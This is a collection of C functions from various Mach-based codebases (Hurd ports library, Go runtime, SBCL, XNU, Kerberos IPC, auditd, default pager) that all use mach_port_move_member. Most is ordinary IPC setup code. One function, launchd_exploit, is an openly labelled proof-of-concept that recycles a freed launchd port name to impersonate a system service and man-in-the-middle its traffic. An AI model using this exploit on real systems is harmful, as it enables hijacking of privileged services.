/* Detach the Mach receive right managed by PORTSTRUCT from the ports
   machinery and hand it to the caller.  Returns the raw receive right,
   or MACH_PORT_NULL if the port had none.  After this call the
   port_info no longer owns the right; the caller does.  */
mach_port_t ports_claim_right (void *portstruct)
{
  error_t err;
  struct port_info *pi = portstruct;
  /* NOTE(review): port_right is read before _ports_lock is taken;
     presumably callers guarantee no concurrent mutation of this field
     at this point -- confirm.  */
  mach_port_t ret = pi->port_right;

  if (ret == MACH_PORT_NULL)
    return ret;

  mutex_lock (&_ports_lock);
  /* Unhook the right from the bucket's name -> port_info hash table.  */
  hurd_ihash_locp_remove (&pi->bucket->htable, pi->hentry);
  /* Pull the right out of its port set so the ports machinery stops
     receiving messages on it.  */
  err = mach_port_move_member (mach_task_self (), ret, MACH_PORT_NULL);
  assert_perror (err);
  pi->port_right = MACH_PORT_NULL;
  if (pi->flags & PORT_HAS_SENDRIGHTS)
    {
      /* Drop the reference that outstanding send rights were holding;
         unlock first since ports_port_deref takes the lock itself.  */
      pi->flags &= ~PORT_HAS_SENDRIGHTS;
      mutex_unlock (&_ports_lock);
      ports_port_deref (pi);
    }
  else
    mutex_unlock (&_ports_lock);
  return ret;
}
// Called by each new OS thread to bind its EXC_BAD_ACCESS exception
// to mach_exception_handler_port_set.
//
// Aborts the process on any Mach/pthread failure; there is no sane
// way to continue without exception handling in place.
void darwin_arm_init_thread_exception_port() {
	int ret;
	mach_port_t port = MACH_PORT_NULL;
	mach_port_t thread = MACH_PORT_NULL;

	// Receive right on which this thread's exceptions will be delivered.
	ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
	if (ret) {
		fprintf(stderr, "runtime/cgo: mach_port_allocate failed: %d\n", ret);
		abort();
	}
	// The exception mechanism needs a send right to deliver messages.
	ret = mach_port_insert_right(
	    mach_task_self(),
	    port,
	    port,
	    MACH_MSG_TYPE_MAKE_SEND);
	if (ret) {
		fprintf(stderr, "runtime/cgo: mach_port_insert_right failed: %d\n", ret);
		abort();
	}

	// mach_thread_self() returns a send right with a +1 user reference
	// that must be deallocated, otherwise every thread started leaks
	// one port right in this task.
	thread = mach_thread_self();
	ret = thread_set_exception_ports(
	    thread,
	    EXC_MASK_BAD_ACCESS,
	    port,
	    EXCEPTION_DEFAULT,
	    THREAD_STATE_NONE);
	if (ret) {
		fprintf(stderr, "runtime/cgo: thread_set_exception_ports failed: %d\n", ret);
		abort();
	}
	mach_port_deallocate(mach_task_self(), thread);

	// Publish the new port into the shared port set under the lock so
	// the handler thread observes a consistent set.
	ret = pthread_mutex_lock(&mach_exception_handler_port_set_mu);
	if (ret) {
		fprintf(stderr, "runtime/cgo: pthread_mutex_lock failed: %d\n", ret);
		abort();
	}
	ret = mach_port_move_member(
	    mach_task_self(),
	    port,
	    mach_exception_handler_port_set);
	if (ret) {
		fprintf(stderr, "runtime/cgo: mach_port_move_member failed: %d\n", ret);
		abort();
	}
	ret = pthread_mutex_unlock(&mach_exception_handler_port_set_mu);
	if (ret) {
		fprintf(stderr, "runtime/cgo: pthread_mutex_unlock failed: %d\n", ret);
		abort();
	}
}
/* tell the kernel that we want EXC_BAD_ACCESS exceptions sent to the
   exception port (which is being listened to do by the mach exception
   handling thread).  Any failure is fatal via lose(); on success the
   (always-zero) last kern_return_t is returned.  */
kern_return_t mach_thread_init(mach_port_t thread_exception_port)
{
    kern_return_t kr;
    mach_port_t self_thread;

    /* allocate a named port for the thread */
    FSHOW((stderr, "Allocating mach port %x\n", thread_exception_port));
    kr = mach_port_allocate_name(current_mach_task,
                                 MACH_PORT_RIGHT_RECEIVE,
                                 thread_exception_port);
    if (kr) {
        lose("mach_port_allocate_name failed with return_code %d\n", kr);
    }

    /* establish the right for the thread_exception_port to send messages */
    kr = mach_port_insert_right(current_mach_task,
                                thread_exception_port,
                                thread_exception_port,
                                MACH_MSG_TYPE_MAKE_SEND);
    if (kr) {
        lose("mach_port_insert_right failed with return_code %d\n", kr);
    }

    /* point this thread's bad-access/bad-instruction exceptions at the
       new port */
    self_thread = mach_thread_self();
    kr = thread_set_exception_ports(self_thread,
                                    EXC_MASK_BAD_ACCESS | EXC_MASK_BAD_INSTRUCTION,
                                    thread_exception_port,
                                    EXCEPTION_DEFAULT,
                                    THREAD_STATE_NONE);
    if (kr) {
        lose("thread_set_exception_ports failed with return_code %d\n", kr);
    }

    /* drop the extra reference mach_thread_self() handed us */
    kr = mach_port_deallocate(current_mach_task, self_thread);
    if (kr) {
        lose("mach_port_deallocate failed with return_code %d\n", kr);
    }

    /* hand the port to the exception-handler thread's port set */
    kr = mach_port_move_member(current_mach_task,
                               thread_exception_port,
                               mach_exception_handler_port_set);
    if (kr) {
        lose("mach_port_move_member failed with return_code %d\n", kr);
    }

    return kr;
}
/* Trap entry for mach_port_move_member(): move ARGS->member into the
 * port set ARGS->after, within the calling task's own IPC space only.
 * Returns MACH_SEND_INVALID_DEST if the target name does not resolve
 * to the current task.  */
int
_kernelrpc_mach_port_move_member_trap(struct _kernelrpc_mach_port_move_member_args *args)
{
	int rv = MACH_SEND_INVALID_DEST;
	task_t task = port_name_to_task(args->target);

	/* Only operate on the caller's own IPC space. */
	if (task == current_task())
		rv = mach_port_move_member(task->itk_space, args->member,
		    args->after);

	/* port_name_to_task() returned a task reference (possibly NULL);
	 * release it. */
	if (task)
		task_deallocate(task);

	return (rv);
}
/* Allocate a new per-client connection port, add it to the global
 * listen port set, and request a no-senders notification on it so the
 * server notices when the client exits or crashes.  On success the
 * receive right is returned in *out_connection_port (ownership passes
 * to the caller); on failure the partially-created right is released
 * and the first error encountered is returned.  in_server_port is
 * currently unused beyond MIG routing.  */
kern_return_t k5_ipc_server_create_client_connection (mach_port_t in_server_port, mach_port_t *out_connection_port)
{
    kern_return_t err = KERN_SUCCESS;
    mach_port_t connection_port = MACH_PORT_NULL;
    mach_port_t old_notification_target = MACH_PORT_NULL;

    if (!err) {
        err = mach_port_allocate (mach_task_self (), MACH_PORT_RIGHT_RECEIVE,
                                  &connection_port);
    }

    if (!err) {
        err = mach_port_move_member (mach_task_self (),
                                     connection_port, g_listen_port_set);
    }

    if (!err) {
        /* request no-senders notification so we can tell when client quits/crashes */
        err = mach_port_request_notification (mach_task_self (),
                                              connection_port,
                                              MACH_NOTIFY_NO_SENDERS, 1,
                                              connection_port,
                                              MACH_MSG_TYPE_MAKE_SEND_ONCE,
                                              &old_notification_target );
    }

    if (!err) {
        err = k5_ipc_server_add_client (connection_port);
    }

    if (!err) {
        *out_connection_port = connection_port;
        connection_port = MACH_PORT_NULL;  /* ownership transferred to caller */
    }

    if (MACH_PORT_VALID (connection_port)) {
        /* We hold a RECEIVE right here, not a send right, so
         * mach_port_deallocate() would fail with KERN_INVALID_RIGHT and
         * leak the port.  Drop the receive right explicitly instead. */
        mach_port_mod_refs (mach_task_self (), connection_port,
                            MACH_PORT_RIGHT_RECEIVE, -1);
    }

    return err;
}
/* Proof-of-concept: attempt to replace the launchd service
 * target_service_name with a receive right we own, by freeing the
 * service's port name inside launchd and recycling that name via
 * generation-number wraparound, then man-in-the-middling the service.
 * app_group is used as a prefix for the dummy service names we
 * register.  Aborts the process on allocation failures. */
void launchd_exploit(char* app_group) {
  char* target_service_name = default_target_service_name;

  // allocate the receive rights which we will try to replace the service with:
  // (we'll also use them to loop the mach port name in the target)
  size_t n_ports = 0x1000;
  // NOTE(review): calloc's conventional argument order is (nmemb, size);
  // these are swapped here, and sizeof(void*) over-sizes mach_port_t
  // elements -- harmless over-allocation, but worth confirming intent.
  mach_port_t* ports = calloc(sizeof(void*), n_ports);
  for (int i = 0; i < n_ports; i++) {
    kern_return_t err;
    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]);
    if (err != KERN_SUCCESS) {
      printf("failed to allocate port: %s\n", mach_error_string(err));
      exit(EXIT_FAILURE);
    }
    // give ourselves a send right on each receive right so the names can
    // travel inside the looper messages sent below
    err = mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND);
    if (err != KERN_SUCCESS) {
      printf("failed to insert send right: %s\n", mach_error_string(err));
      exit(EXIT_FAILURE);
    }
  }

  // generate some service names we can use:
  char** names = calloc(sizeof(char*), n_ports);
  for (int i = 0; i < n_ports; i++) {
    char name[strlen(app_group)+64];
    sprintf(name, "%s.%d", app_group, i);
    names[i] = strdup(name);
  }

  // lookup a send right to the target to be replaced
  mach_port_t target_service = lookup(target_service_name);

  // free the target in launchd
  do_free(bootstrap_port, target_service);

  // send one smaller looper message to push the free'd name down the free list:
  send_looper(bootstrap_port, ports, 0x100, MACH_MSG_TYPE_MAKE_SEND);

  // send the larger ones to loop the generation number whilst leaving the name in the middle of the long freelist
  for (int i = 0; i < 62; i++) {
    send_looper(bootstrap_port, ports, 0x200, MACH_MSG_TYPE_MAKE_SEND);
  }

  // now that the name should have looped round (and still be near the middle of the freelist
  // try to replace it by registering a lot of new services
  for (int i = 0; i < n_ports; i++) {
    kern_return_t err = bootstrap_register(bootstrap_port, names[i], ports[i]);
    if (err != KERN_SUCCESS) {
      printf("failed to register service %d, continuing anyway...\n", i);
    }
  }

  // add all those receive rights to a port set:
  mach_port_t ps;
  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_PORT_SET, &ps);
  for (int i = 0; i < n_ports; i++) {
    mach_port_move_member(mach_task_self(), ports[i], ps);
  }

  // listen on all the candidate replacement ports at once, then provoke
  // traffic to the (hopefully replaced) target service
  start_mitm_thread(target_service, ps);
  kill_powerd();
  return;
}
/* Transfer the Mach receive right managed by FROMSTRUCT into TOSTRUCT,
   destroying any receive right TOSTRUCT previously held.  FROMSTRUCT
   is left holding no right.  Reference counts are adjusted so that the
   PORT_HAS_SENDRIGHTS reference follows the right.  Always returns 0.  */
error_t
ports_transfer_right (void *tostruct, void *fromstruct)
{
  struct port_info *topi = tostruct;
  struct port_info *frompi = fromstruct;
  mach_port_t port;
  int dereffrompi = 0;   /* drop one ref on FROMPI after unlocking */
  int dereftopi = 0;     /* drop one ref on TOPI after unlocking */
  int hassendrights = 0; /* FROMPI's right had outstanding send rights */
  error_t err;

  mutex_lock (&_ports_lock);

  /* Fetch the port in FROMPI and clear its use */
  port = frompi->port_right;
  if (port != MACH_PORT_NULL)
    {
      hurd_ihash_locp_remove (&frompi->bucket->htable, frompi->hentry);
      frompi->port_right = MACH_PORT_NULL;
      if (frompi->flags & PORT_HAS_SENDRIGHTS)
	{
	  /* The send-rights reference moves with the right; remember to
	     release FROMPI's copy of it below.  */
	  frompi->flags &= ~PORT_HAS_SENDRIGHTS;
	  hassendrights = 1;
	  dereffrompi = 1;
	}
    }

  /* Destroy the existing right in TOPI. */
  if (topi->port_right != MACH_PORT_NULL)
    {
      hurd_ihash_locp_remove (&topi->bucket->htable, topi->hentry);
      err = mach_port_mod_refs (mach_task_self (), topi->port_right,
				MACH_PORT_RIGHT_RECEIVE, -1);
      assert_perror (err);
      if ((topi->flags & PORT_HAS_SENDRIGHTS) && !hassendrights)
	{
	  /* TOPI loses its send-rights reference and gains none.  */
	  dereftopi = 1;
	  topi->flags &= ~PORT_HAS_SENDRIGHTS;
	}
      else if (((topi->flags & PORT_HAS_SENDRIGHTS) == 0) && hassendrights)
	{
	  /* TOPI inherits the send-rights reference from FROMPI.  */
	  topi->flags |= PORT_HAS_SENDRIGHTS;
	  topi->refcnt++;
	}
    }

  /* Install the new right in TOPI. */
  topi->port_right = port;
  topi->cancel_threshold = frompi->cancel_threshold;
  topi->mscount = frompi->mscount;

  if (port)
    {
      hurd_ihash_add (&topi->bucket->htable, port, topi);
      if (topi->bucket != frompi->bucket)
	{
	  /* Re-home the receive right in the new bucket's port set so
	     messages are demuxed by the right bucket.  */
	  err = mach_port_move_member (mach_task_self (), port,
				       topi->bucket->portset);
	  assert_perror (err);
	}
    }

  mutex_unlock (&_ports_lock);

  /* Take care of any lowered reference counts. */
  if (dereffrompi)
    ports_port_deref (frompi);
  if (dereftopi)
    ports_port_deref (topi);
  return 0;
}
int32_t k5_ipc_server_listen_loop (void)
{
    /* Run the Mach IPC listen loop.
     * This will call k5_ipc_server_create_client_connection for new clients
     * and k5_ipc_server_request for existing clients.
     * Returns the first error encountered, or 0 on a clean quit. */

    kern_return_t err = KERN_SUCCESS;
    char *service = NULL;
    char *lookup = NULL;
    mach_port_t lookup_port = MACH_PORT_NULL;
    mach_port_t boot_port = MACH_PORT_NULL;
    mach_port_t previous_notify_port = MACH_PORT_NULL;

    if (!err) {
        err = k5_ipc_server_get_lookup_and_service_names (&lookup, &service);
    }

    if (!err) {
        /* Get the bootstrap port */
        err = task_get_bootstrap_port (mach_task_self (), &boot_port);
    }

    if (!err) {
        /* We are an on-demand server so our lookup port already exists. */
        err = bootstrap_check_in (boot_port, lookup, &lookup_port);
    }

    if (!err) {
        /* We are an on-demand server so our service port already exists. */
        err = bootstrap_check_in (boot_port, service, &g_service_port);
    }

    if (!err) {
        /* Allocate a receive right on which no-senders notifications
         * will be delivered (note: this is a RECEIVE right, not the
         * port set; the listen port set is allocated further down) */
        err = mach_port_allocate (mach_task_self (),
                                  MACH_PORT_RIGHT_RECEIVE,
                                  &g_notify_port);
    }

    if (!err) {
        /* Ask for notification when the server port has no more senders
         * A send-once right != a send right so our send-once right will
         * not interfere with the notification */
        err = mach_port_request_notification (mach_task_self (),
                                              g_service_port,
                                              MACH_NOTIFY_NO_SENDERS, true,
                                              g_notify_port,
                                              MACH_MSG_TYPE_MAKE_SEND_ONCE,
                                              &previous_notify_port);
    }

    if (!err) {
        /* Create the port set that the server will listen on */
        err = mach_port_allocate (mach_task_self (),
                                  MACH_PORT_RIGHT_PORT_SET,
                                  &g_listen_port_set);
    }

    if (!err) {
        /* Add the lookup port to the port set */
        err = mach_port_move_member (mach_task_self (),
                                     lookup_port, g_listen_port_set);
    }

    if (!err) {
        /* Add the service port to the port set */
        err = mach_port_move_member (mach_task_self (),
                                     g_service_port, g_listen_port_set);
    }

    if (!err) {
        /* Add the notify port to the port set */
        err = mach_port_move_member (mach_task_self (),
                                     g_notify_port, g_listen_port_set);
    }

    while (!err && !g_ready_to_quit) {
        /* Handle one message at a time so we can check to see if
         * the server wants to quit */
        err = mach_msg_server_once (k5_ipc_request_demux,
                                    K5_IPC_MAX_MSG_SIZE,
                                    g_listen_port_set,
                                    MACH_MSG_OPTION_NONE);
    }

    /* Clean up the ports and strings */
    if (MACH_PORT_VALID (g_notify_port)) {
        /* mach_port_destroy tears down all rights to the name at once */
        mach_port_destroy (mach_task_self (), g_notify_port);
        g_notify_port = MACH_PORT_NULL;
    }
    if (MACH_PORT_VALID (g_listen_port_set)) {
        mach_port_destroy (mach_task_self (), g_listen_port_set);
        g_listen_port_set = MACH_PORT_NULL;
    }
    if (MACH_PORT_VALID (boot_port)) {
        mach_port_deallocate (mach_task_self (), boot_port);
    }
    free (service);
    free (lookup);

    return err;
}
/* Demo Mach service: check in with launchd as "mach.service-test",
 * put the service port in a port set, watch the set with an
 * EVFILT_MACHPORT kevent, and echo a fixed reply to every message
 * received.  Loops forever; logs via syslog.  */
int main()
{
    kern_return_t kr;
    mach_port_t bport, port, pset;
    struct msg_recv message;
    struct msg_send reply;
    struct kevent64_s kev;
    int kq, r;

    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bport);
    syslog(LOG_ERR, "bootstrap port: %d", bport);

    /* Obtain the receive right for our launchd-registered service. */
    kr = bootstrap_check_in(bootstrap_port, "mach.service-test", &port);
    if (kr != KERN_SUCCESS) {
        syslog(LOG_ERR, "bootstrap_check_in: kr=%d", kr);
        exit(1);
    }
    syslog(LOG_ERR, "service port: %d", port);

    kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_PORT_SET, &pset);
    if (kr != KERN_SUCCESS) {
        syslog(LOG_ERR, "mach_port_allocate: kr=%d", kr);
        exit(1);
    }

    kr = mach_port_move_member(mach_task_self(), port, pset);
    if (kr != KERN_SUCCESS) {
        syslog(LOG_ERR, "mach_port_move_member: kr=%d", kr);
        exit(1);
    }

    /* Watch the port set (not the individual port) for incoming messages. */
    kq = kqueue();
    syslog(LOG_ERR, "kqueue fd: %d", kq);
    memset(&kev, 0, sizeof(struct kevent64_s));
    EV_SET64(&kev, pset, EVFILT_MACHPORT, EV_ADD | EV_ENABLE, 0, 0, 0, 0, 0);
    if (kevent64(kq, &kev, 1, NULL, 0, 0, NULL) < 0) {
        syslog(LOG_ERR, "kevent64: %s (%d)", strerror(errno), errno);
        return 0;
    }

    for (;;) {
        /* msgh_local_port names where to receive; msgh_size is the
         * maximum size mach_msg_receive may fill in. */
        message.hdr.msgh_local_port = port;
        message.hdr.msgh_size = sizeof(struct msg_recv);

        /* Block until the kevent reports the port set is readable. */
        r = kevent64(kq, NULL, 0, &kev, 1, 0, NULL);
        if (r < 0) {
            syslog(LOG_ERR, "kevent64 failed: %s (%d)", strerror(errno), errno);
            continue;
        }
        syslog(LOG_ERR, "kevent64: events=%d", r);

        kr = mach_msg_receive((mach_msg_header_t *)&message);
        if (kr != KERN_SUCCESS)
            syslog(LOG_ERR, "mach_msg_receive failure: kr=%d", kr);
        else
            syslog(LOG_ERR, "received message on port %d: body=%s",
                   message.hdr.msgh_remote_port, message.body);

        /* Echo a fixed reply to the sender's reply port.
         * NOTE(review): msgh_bits claims MACH_MSG_TYPE_COPY_SEND, but a
         * client reply port is typically a send-once right (which would
         * need MOVE_SEND_ONCE) -- confirm what the test client sends. */
        memset(&reply, 0, sizeof(struct msg_send));
        sprintf(&reply.body[0], "hello buddy");
        reply.hdr.msgh_local_port = MACH_PORT_NULL;
        reply.hdr.msgh_remote_port = message.hdr.msgh_remote_port;
        reply.hdr.msgh_size = sizeof(struct msg_send);
        reply.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);

        kr = mach_msg_send((mach_msg_header_t *)&reply);
        if (kr != KERN_SUCCESS)
            syslog(LOG_ERR, "mach_msg_send failure: kr=%d", kr);
    }
}
/* In-kernel Unix-exception handler thread body: allocates the global
 * exception port and its port set, publishes the send right in
 * ux_exception_port (waking any waiters), then loops forever
 * receiving exception messages and dispatching them through
 * mach_exc_server().  Never returns; panics on setup failure.  */
static void
ux_handler(void)
{
    task_t self = current_task();
    mach_port_name_t exc_port_name;
    mach_port_name_t exc_set_name;

    /* self->kernel_vm_space = TRUE; */
    ux_handler_self = self;

    /*
     * Allocate a port set that we will receive on.
     */
    if (mach_port_allocate(get_task_ipcspace(ux_handler_self),
                           MACH_PORT_RIGHT_PORT_SET,
                           &exc_set_name) != MACH_MSG_SUCCESS)
        panic("ux_handler: port_set_allocate failed");

    /*
     * Allocate an exception port and use object_copyin to
     * translate it to the global name.  Put it into the set.
     */
    if (mach_port_allocate(get_task_ipcspace(ux_handler_self),
                           MACH_PORT_RIGHT_RECEIVE,
                           &exc_port_name) != MACH_MSG_SUCCESS)
        panic("ux_handler: port_allocate failed");
    if (mach_port_move_member(get_task_ipcspace(ux_handler_self),
                              exc_port_name,
                              exc_set_name) != MACH_MSG_SUCCESS)
        panic("ux_handler: port_set_add failed");

    if (ipc_object_copyin(get_task_ipcspace(self), exc_port_name,
                          MACH_MSG_TYPE_MAKE_SEND,
                          (void *) &ux_exception_port) != MACH_MSG_SUCCESS)
        panic("ux_handler: object_copyin(ux_exception_port) failed");

    /* Announce that ux_exception_port is ready; tasks may be blocked
     * waiting for it (hence the wakeup under the proc list lock).  */
    proc_list_lock();
    thread_wakeup(&ux_exception_port);
    proc_list_unlock();

    /* Message handling loop. */
    for (;;) {
        struct rep_msg {
            mach_msg_header_t Head;
            NDR_record_t NDR;
            kern_return_t RetCode;
        } rep_msg;
        struct exc_msg {
            mach_msg_header_t Head;
            /* start of the kernel processed data */
            mach_msg_body_t msgh_body;
            mach_msg_port_descriptor_t thread;
            mach_msg_port_descriptor_t task;
            /* end of the kernel processed data */
            NDR_record_t NDR;
            exception_type_t exception;
            mach_msg_type_number_t codeCnt;
            mach_exception_data_t code;
            /* some times RCV_TO_LARGE probs */
            char pad[512];
        } exc_msg;
        mach_port_name_t reply_port;
        kern_return_t result;

        /* Receive on the whole port set so any exception port works. */
        exc_msg.Head.msgh_local_port = CAST_MACH_NAME_TO_PORT(exc_set_name);
        exc_msg.Head.msgh_size = sizeof (exc_msg);
#if 0
        result = mach_msg_receive(&exc_msg.Head);
#else
        /* NOTE(review): this 7-argument mach_msg_receive is a
         * kernel-internal variant, not the 1-argument user API above
         * -- confirm against the in-kernel prototype.  */
        result = mach_msg_receive(&exc_msg.Head, MACH_RCV_MSG,
                                  sizeof (exc_msg), exc_set_name,
                                  MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL, 0);
#endif
        if (result == MACH_MSG_SUCCESS) {
            reply_port = CAST_MACH_PORT_TO_NAME(exc_msg.Head.msgh_remote_port);

            /* Dispatch to the MIG-generated exception server; send the
             * reply ourselves, and drop the reply right if sending it
             * back failed so it is not leaked.  */
            if (mach_exc_server(&exc_msg.Head, &rep_msg.Head)) {
                result = mach_msg_send(&rep_msg.Head, MACH_SEND_MSG,
                                       sizeof (rep_msg),MACH_MSG_TIMEOUT_NONE,MACH_PORT_NULL);
                if (reply_port != 0 && result != MACH_MSG_SUCCESS)
                    mach_port_deallocate(get_task_ipcspace(ux_handler_self), reply_port);
            }
        }
        else if (result == MACH_RCV_TOO_LARGE)
            /* ignore oversized messages */;
        else
            panic("exception_handler");
    }
}
/* Create and initialize the i_mem_object glue structure for INODE,
 * optionally allocating its Mach memory-object port and adding it to
 * the inode pager's port set.  Takes a reference on INODE (i_count++).
 * Returns the new structure, the pre-existing one if another thread
 * won the race, or MEMORY_OBJECT_NULL on allocation failure.  */
struct i_mem_object *
imo_create(
	struct inode *inode,
	boolean_t allocate_port)
{
	struct i_mem_object *imo;
	kern_return_t kr;

	imo = (struct i_mem_object *) kmalloc(sizeof (struct i_mem_object), GFP_KERNEL);
	if (imo == NULL)
		return MEMORY_OBJECT_NULL;

	if (inode->i_mem_object != NULL) {
		/*
		 * Somebody else beat us...
		 */
		kfree(imo);
		return inode->i_mem_object;
	}

	/* NOTE(review): the check above and the publication below are not
	 * serialized within this function; presumably the caller holds a
	 * lock covering inode->i_mem_object -- confirm.  */
	inode->i_count++;
	inode->i_mem_object = imo;

	/* Start with no ports, no references, cacheable, delay-copy. */
	imo->imo_mem_obj = MACH_PORT_NULL;
	imo->imo_mem_obj_control = MACH_PORT_NULL;
	imo->imo_refcnt = 0;
	imo->imo_cacheable = TRUE;
	imo->imo_attrchange = FALSE;
	imo->imo_attrchange_wait = NULL;
	imo->imo_copy_strategy = MEMORY_OBJECT_COPY_DELAY;
	imo->imo_errors = 0;
	imo->imo_inode = inode;
	imo->imo_urefs = 0;

	if (allocate_port) {
		/*
		 * Allocate a memory object port
		 */
		kr = serv_port_allocate_name(&imo->imo_mem_obj, imo);
		if (kr != KERN_SUCCESS) {
			panic("imo_create: can't allocate port");
		}

		/*
		 * Get a send right for this port
		 */
		kr = mach_port_insert_right(mach_task_self(),
					    imo->imo_mem_obj,
					    imo->imo_mem_obj,
					    MACH_MSG_TYPE_MAKE_SEND);
		if (kr != KERN_SUCCESS) {
			MACH3_DEBUG(0, kr, ("imo_create: mach_port_insert_right(0x%x)", imo->imo_mem_obj));
			panic("imo_create: can't allocate send right");
		}

		/*
		 * Add the new memory_object port to the port set
		 */
		kr = mach_port_move_member(mach_task_self(),
					   imo->imo_mem_obj,
					   inode_pager_port_set);
		if (kr != KERN_SUCCESS) {
			MACH3_DEBUG(0, kr, ("imo_create: mach_port_move_member(0x%x)", imo->imo_mem_obj));
			panic("imo_create: can't add object to port set");
		}
	}

	return imo;
}
/* One-time initialization of the default pager: record task/thread
 * identity, allocate the exported DMM port and the internal, external,
 * and default port sets, register as the host's default memory
 * manager (unless built as USER_PAGER), size the worker-thread pool
 * from the CPU count, and initialize VM bookkeeping.  Panics on any
 * unrecoverable setup failure.  */
void default_pager_initialize(
	mach_port_t host_port)
{
	kern_return_t kr;
	static char here[] = "default_pager_initialize";

	/*
	 * Initial thread and task ports.
	 */
	default_pager_self = mach_task_self();
	default_pager_default_thread = mach_thread_self();

	PRINTF_LOCK_INIT();

	/*
	 * Make ourselves unswappable.
	 * NOTE(review): this uses the global default_pager_host_port rather
	 * than the host_port parameter used everywhere else below --
	 * confirm the global is initialized before this call.
	 */
	kr = task_swappable(default_pager_host_port, default_pager_self, FALSE);
	if (kr != KERN_SUCCESS)
		dprintf(("task_swappable failed 0x%x %s\n",
			 kr, mach_error_string(kr)));

	/*
	 * Exported DMM port.
	 */
	kr = mach_port_allocate(default_pager_self, MACH_PORT_RIGHT_RECEIVE,
				&default_pager_default_port);
	if (kr != KERN_SUCCESS)
		Panic("default port");

	/*
	 * Port sets.
	 */
	kr = mach_port_allocate(default_pager_self, MACH_PORT_RIGHT_PORT_SET,
				&default_pager_internal_set);
	if (kr != KERN_SUCCESS)
		Panic("internal set");
	kr = mach_port_allocate(default_pager_self, MACH_PORT_RIGHT_PORT_SET,
				&default_pager_external_set);
	if (kr != KERN_SUCCESS)
		Panic("external set");

	/*
	 * Export pager interfaces.
	 */
#ifdef USER_PAGER
	if ((kr = netname_check_in(name_server_port, "UserPager",
				   default_pager_self,
				   default_pager_default_port))
	    != KERN_SUCCESS) {
		dprintf(("netname_check_in returned 0x%x %s\n",
			 kr, mach_error_string(kr)));
		exit(1);
	}
#else /* USER_PAGER */
	{
		int clsize;
		memory_object_t DMM;

		/* get a send right for vm_set_default_memory_manager */
		/* NOTE(review): kr is not checked after this call */
		kr = mach_port_insert_right(default_pager_self,
					    default_pager_default_port,
					    default_pager_default_port,
					    MACH_MSG_TYPE_MAKE_SEND);
		DMM = default_pager_default_port;
		clsize = (vm_page_size << vstruct_def_clshift);
		kr = host_default_memory_manager(host_port, &DMM, clsize);
		/* DMM should come back null: any previous manager means
		 * someone else already claimed the role. */
		if ((kr != KERN_SUCCESS) || (DMM != MACH_PORT_NULL))
			Panic("default memory manager");

		/* release the extra send right */
		(void) mach_port_mod_refs(default_pager_self,
					  default_pager_default_port,
					  MACH_PORT_RIGHT_SEND,
					  -1);
	}
#endif /* USER_PAGER */

	kr = mach_port_allocate(default_pager_self, MACH_PORT_RIGHT_PORT_SET,
				&default_pager_default_set);
	if (kr != KERN_SUCCESS)
		Panic("default set");
	kr = mach_port_move_member(default_pager_self,
				   default_pager_default_port,
				   default_pager_default_set);
	if (kr != KERN_SUCCESS)
		Panic("set up default");

	/*
	 * Arrange for wiring privileges.
	 */
	wire_setup(host_port);

	/*
	 * Find out how many CPUs we have, to determine the number
	 * of threads to create.
	 */
	if (default_pager_internal_count == 0) {
		host_basic_info_data_t h_info;
		mach_msg_type_number_t h_info_count;

		h_info_count = HOST_BASIC_INFO_COUNT;
		(void) host_info(host_port, HOST_BASIC_INFO,
				 (host_info_t) &h_info, &h_info_count);

		/*
		 * Random computation to get more parallelism on
		 * multiprocessors.
		 */
		default_pager_internal_count =
		    ((h_info.avail_cpus > 32) ? 32 : h_info.avail_cpus) / 4 + 3;
	}

	/*
	 * Vm variables.
	 */
	vm_page_mask = vm_page_size - 1;
	vm_page_shift = log2(vm_page_size);

	/*
	 * List of all vstructs.
	 */
	VSL_LOCK_INIT();
	queue_init(&vstruct_list.vsl_queue);
	queue_init(&vstruct_list.vsl_leak_queue);
	vstruct_list.vsl_count = 0;

	VSTATS_LOCK_INIT(&global_stats.gs_lock);

	bs_initialize();
}
/* Set up auditd's Mach IPC: a port set containing a signal-reflection
 * port and a control (trigger) port.  Under launchd the control port
 * comes from the launchd dictionary; otherwise it is allocated here
 * and registered with the kernel via host_set_audit_control_port().
 * Returns 0 on success, -1 on failure.  */
static int
mach_setup(int launchd_flag)
{
	mach_msg_type_name_t poly;

	/*
	 * Allocate a port set.
	 */
	if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_PORT_SET,
	    &port_set) != KERN_SUCCESS) {
		auditd_log_err("Allocation of port set failed");
		return (-1);
	}
	/*
	 * Allocate a signal reflection port.
	 */
	if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE,
	    &signal_port) != KERN_SUCCESS ||
	    mach_port_move_member(mach_task_self(), signal_port, port_set)
	    != KERN_SUCCESS) {
		auditd_log_err("Allocation of signal port failed");
		return (-1);
	}
	/*
	 * Allocate a trigger port.
	 */
	if (launchd_flag) {
		/*
		 * If started under launchd, lookup port in launchd dictionary.
		 */
		if ((control_port = lookup_machport(__AUDIT_LAUNCHD_LABEL)) ==
		    MACH_PORT_NULL ||
		    mach_port_move_member(mach_task_self(), control_port,
		    port_set) != KERN_SUCCESS) {
			auditd_log_err("Cannot get Mach control port"
			    " via launchd");
			return (-1);
		} else
			auditd_log_debug("Mach control port registered"
			    " via launchd");
	} else {
		/*
		 * If not started under launchd, allocate port and register.
		 */
		if (mach_port_allocate(mach_task_self(),
		    MACH_PORT_RIGHT_RECEIVE, &control_port) != KERN_SUCCESS ||
		    mach_port_move_member(mach_task_self(), control_port,
		    port_set) != KERN_SUCCESS) {
			auditd_log_err("Allocation of trigger port failed");
			/*
			 * Fix: previously this fell through and called
			 * mach_port_extract_right() on an invalid
			 * control_port; fail like the other paths.
			 */
			return (-1);
		}
		/*
		 * Create a send right on our trigger port.
		 */
		mach_port_extract_right(mach_task_self(), control_port,
		    MACH_MSG_TYPE_MAKE_SEND, &control_port, &poly);
		/*
		 * Register the trigger port with the kernel.
		 */
		if (host_set_audit_control_port(mach_host_self(),
		    control_port) != KERN_SUCCESS) {
			auditd_log_err("Cannot set Mach control port");
			return (-1);
		} else
			auditd_log_debug("Mach control port registered");
	}
	return (0);
}